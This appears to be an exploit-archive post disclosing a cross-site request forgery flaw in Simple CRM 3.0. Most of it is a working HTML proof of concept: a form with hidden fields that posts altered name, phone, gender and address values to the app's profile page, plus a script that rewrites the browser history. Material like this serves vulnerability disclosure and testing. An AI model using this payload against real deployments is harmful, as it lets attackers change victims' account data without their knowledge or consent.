Simple CRM 3.0 Cross Site Request Forgery

Simple CRM version 3.0 suffers from a cross site request forgery vulnerability.

MD5 | f9df6eaf525f45b9f265bd32aaccf23c

# Exploit Title: Simple CRM 3.0 - 'Change user information' Cross-Site Request Forgery (CSRF)
# Date: 20/06/2021
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage:
# Software Link:
# Version: 3.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Simple CRM suffers from Cross-site request forgery, which the attacker can manipulate user data via triggering user to visit suspicious url

Vulnerable page: /crm/profile.php

<script>history.pushState('', '', '/')</script>
<form action="http://localhost/crm/profile.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="name" value="test" />
<input type="hidden" name="alt_email" value="" />
<input type="hidden" name="phone" value="0123456789" />
<input type="hidden" name="gender" value="m" />
<input type="hidden" name="address" value="jgjgjgjjggjcsrf" />
<input type="hidden" name="update" value="Update" />
<input type="submit" value="Exploit" />

Related Posts